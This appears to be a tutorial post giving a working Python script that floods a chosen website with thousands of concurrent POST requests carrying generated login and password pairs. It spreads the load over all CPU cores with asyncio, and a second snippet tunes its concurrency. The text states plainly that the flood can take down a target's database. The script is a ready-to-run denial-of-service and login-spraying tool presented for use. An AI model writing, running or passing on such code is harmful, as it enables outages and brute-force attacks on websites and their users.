Sending a very large number of requests to a given website with Python
```python
import aiohttp
import asyncio
import multiprocessing

url = ""  # target URL (left empty here; fill in before running)


async def send_request(session, data, user_agent):
    """POST one form submission with a per-request User-Agent header."""
    form_data = aiohttp.FormData()
    headers = {'User-Agent': user_agent}
    for key, value in data.items():
        form_data.add_field(key, value)
    try:
        async with session.post(url, data=form_data, headers=headers) as response:
            if 200 <= response.status < 300:
                print(await response.json())
            else:
                print(f"Error: {response.status}")
    except Exception:
        # Swallow per-request failures so one bad request does not stop the batch.
        pass


async def send_request_batch(start_index, end_index):
    """Send one slice of requests concurrently on a single event loop."""
    async with aiohttp.ClientSession() as session:
        tasks = []
        for i in range(start_index, end_index):
            login = f'User {i + 1}'
            password = f'password{i:02d}'
            # The login/password suffix makes each User-Agent string unique.
            task = send_request(
                session,
                {'login': login, 'password': password},
                user_agent='Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 '
                           '(KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36'
                           + login + password,
            )
            tasks.append(task)
        await asyncio.gather(*tasks)


def run_batch(start_index, end_index):
    """Worker-process entry point: create the coroutine in the child.

    A coroutine object cannot be pickled, so it must be built inside the
    child process instead of being passed to multiprocessing.Process.
    """
    asyncio.run(send_request_batch(start_index, end_index))


def main(total_request_count=100):
    # One worker process per CPU core, each running its own event loop.
    num_processes = multiprocessing.cpu_count()
    requests_per_process = total_request_count // num_processes
    processes = []
    for i in range(num_processes):
        start_index = i * requests_per_process
        # The last process also takes the remainder of the integer division.
        end_index = (start_index + requests_per_process
                     if i < num_processes - 1 else total_request_count)
        p = multiprocessing.Process(target=run_batch, args=(start_index, end_index))
        processes.append(p)
        p.start()
    for p in processes:
        p.join()


if __name__ == "__main__":
    main(5000)
```
This code can fire so many requests at the target site that, if no strong protection is in place, it can even knock out its database. Maximum speed is reached by combining every CPU core on the machine with asynchronous requests; beyond that, throughput is limited only by the hardware and the internet connection.
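One practical limit on that speed is the local machine itself: each process hands its whole slice to asyncio.gather at once, so very large batches can open more sockets than the OS allows. Below is a minimal sketch of one way to bound concurrency, using aiohttp's TCPConnector together with an asyncio.Semaphore; the httpbin URL and the limit of 100 are illustrative assumptions, not part of the original script.

```python
import aiohttp
import asyncio

URL = "https://httpbin.org/post"  # placeholder target, assumed for illustration
MAX_CONCURRENCY = 100             # illustrative cap; tune to your machine and link


async def bounded_post(session, semaphore, payload):
    # The semaphore keeps at most MAX_CONCURRENCY requests in flight at once.
    async with semaphore:
        async with session.post(URL, data=payload) as response:
            return response.status


async def main(total=5000):
    semaphore = asyncio.Semaphore(MAX_CONCURRENCY)
    # TCPConnector(limit=...) additionally caps the connection pool size.
    connector = aiohttp.TCPConnector(limit=MAX_CONCURRENCY)
    async with aiohttp.ClientSession(connector=connector) as session:
        tasks = [bounded_post(session, semaphore, {"login": f"User {i}"})
                 for i in range(total)]
        statuses = await asyncio.gather(*tasks, return_exceptions=True)
        print(statuses[:10])


if __name__ == "__main__":
    asyncio.run(main())
```

With a cap like this, the event loop reuses a bounded pool of connections instead of racing to open thousands at once, which usually gives steadier throughput than an unbounded gather.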